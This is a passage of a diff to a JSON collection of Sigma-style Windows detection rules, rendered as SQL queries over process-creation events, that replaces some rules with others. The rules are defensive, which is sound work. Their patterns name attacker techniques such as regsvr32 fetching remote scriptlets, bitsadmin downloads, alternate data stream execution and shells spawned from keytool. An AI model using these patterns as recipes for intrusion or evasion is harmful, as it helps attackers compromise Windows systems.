'%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", - "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File Download Via Bitsadmin", + "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "status": "test", + "description": "Detects usage of bitsadmin downloading a file", + "author": "Michael Haag, FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1485" - ], - "falsepositives": [ - "System administrator usage" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.t1564.004" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" - }, - { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": "proc_creation_win_susp_alternate_data_streams.yml" 
}, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", - "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE 
'%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Attackers can use findstr to hide 
their artifacts or search specific strings and evade defense mechanism", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Administrative findstr usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - 
"filename": "proc_creation_win_susp_copy_system32.yml" + "filename": "proc_creation_win_lolbin_findstr.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "falsepositives": [ - "GPO" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND 
((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_reg_screensaver.yml" - }, - { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", - "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' 
